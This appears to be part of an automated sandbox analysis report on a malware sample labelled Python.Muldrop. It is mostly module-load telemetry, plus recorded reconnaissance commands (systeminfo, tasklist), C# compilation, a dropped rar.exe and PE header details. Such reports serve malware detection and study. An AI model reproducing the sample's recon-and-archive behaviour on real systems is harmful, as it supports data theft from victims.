              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic file information: File size 7266369 > 1048576
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdbhP source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770892655.00007FF8E7290000.00000040.00000001.01000000.00000013.sdmp
